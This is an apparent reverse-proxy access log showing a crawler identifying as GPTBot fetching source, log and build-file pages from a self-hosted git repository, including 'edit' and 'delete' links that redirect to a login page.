"/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 122534] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 24965] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 42643] [Gzip 12.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 12342] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14420] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 22685] [Gzip 10.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 23879] [Gzip 9.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 16357] [Gzip 6.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 16192] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 14763] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 20762] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14390] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11060] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:16:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:16:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:16:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:16:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14409] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" +[17/Feb/2026:16:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14378] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" +[17/Feb/2026:16:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14407] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" +[17/Feb/2026:16:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 13221] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:16:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7794] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" +[17/Feb/2026:16:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10204] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10429] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:23:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/update_status.py" +[17/Feb/2026:16:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11897] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:23:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 